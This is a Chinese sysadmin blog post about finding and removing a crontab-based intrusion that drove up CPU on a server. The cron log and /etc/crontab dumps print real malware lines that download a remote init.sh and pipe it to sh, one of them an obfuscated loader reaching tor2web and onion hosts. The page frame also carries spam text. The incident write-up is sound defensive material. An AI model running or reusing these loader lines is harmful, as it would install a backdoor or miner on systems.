91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

服務器crontab異常,疑是gongjiCPU異常

發布時間:2020-04-21 12:15:20 來源:網絡 閱讀:1114 作者:終而有始 欄目:系統運維

現象:
服務器crontab異常,疑是gongjiCPU異常
服務器crontab異常,疑是gongjiCPU異常
服務器crontab異常,疑是gongjiCPU異常
安裝成功了
服務器crontab異常,疑是gongjiCPU異常

但是沒多久又進來了
服務器crontab異常,疑是gongjiCPU異常
而且至今登錄到系統來了
服務器crontab異常,疑是gongjiCPU異常

[root@izd7oc0a0u64q75bim8bu8z ~]# tail /var/log/cron
\Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z crond[3209]: (cd) ERROR (getpwnam() failed)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z crond[3209]: (cd) ERROR (getpwnam() failed)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z crond[3209]: (cur) ERROR (getpwnam() failed)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND[5724]: (root) CMD (echo 111 >> /home/test.txt)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND[5723]: (nobody) CMD (cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND[5726]: (nginx) CMD (cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND[5725]: (apache) CMD (cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh)
Oct 23 00:24:02 izd7oc0a0u64q75bim8bu8z CROND[5720]: (nginx) MAIL (mailed 32 bytes of output but got status 0x004b#012)
Oct 23 00:24:02 izd7oc0a0u64q75bim8bu8z CROND[5718]: (nobody) MAIL (mailed 32 byte

[root@izd7oc0a0u64q75bim8bu8z tmp]# cat /etc/crontab
/13 root R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && G2="$f" && break;done;fi;if [ $(cat /etc/hosts|grep -i "onion.|timesync.su|tor2web"|wc -l) -ne 0 ];then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;fi; C=" -fsSLk --connect-timeout 26 --max-time 75 ";W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";H="https://7xffbbbebumizpeg";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm2";($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &

每分鐘 nobody nginx apache用戶 執行一次 下載腳本運行
干掉這個腳本,然后停止了crond服務 在var/log/cronrizhikli日志里面就沒有異常下載
腳本

服務器crontab異常,疑是gongjiCPU異常
還有這個異常
服務器crontab異常,疑是gongjiCPU異常
發現這里也有用戶
服務器crontab異常,疑是gongjiCPU異常

打開crontab就一直在下載一分鐘執行一次 服務器crontab異常,疑是gongjiCPU異常
guoran果斷刪了 apache 和nobody 只剩下nginx一個在下載 但是 crontab -l也沒發現啥異常
做最后終于找到惡意用戶位置
服務器crontab異常,疑是gongjiCPU異常
服務器crontab異常,疑是gongjiCPU異常
直接全部刪掉只留下root 最后恢復正常了
服務器crontab異常,疑是gongjiCPU異常
以后要重點關注登錄系統用戶情況
more /var/log/secure |grep Accepted
查詢登錄頻繁用戶
awk '/Failed password/ {print $(NF-3)}' /var/log/secure |sort -n |uniq -c|sort -n |tail
服務器crontab異常,疑是gongjiCPU異常

服務器crontab異常,疑是gongjiCPU異常

服務器crontab異常,疑是gongjiCPU異常

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

新余市| 巴里| 广昌县| 乌鲁木齐县| 监利县| 精河县| 建阳市| 锡林浩特市| 朝阳市| 乌审旗| 新巴尔虎左旗| 分宜县| 阜新市| 丹寨县| 遵义县| 扎鲁特旗| 疏勒县| 德化县| 报价| 黄梅县| 龙胜| 汶上县| 沙坪坝区| 舟曲县| 鞍山市| 湖口县| 青州市| 海阳市| 绵阳市| 新源县| 封开县| 灵宝市| 德安县| 葵青区| 简阳市| 清远市| 龙江县| 曲麻莱县| 柘城县| 扎兰屯市| 湟源县|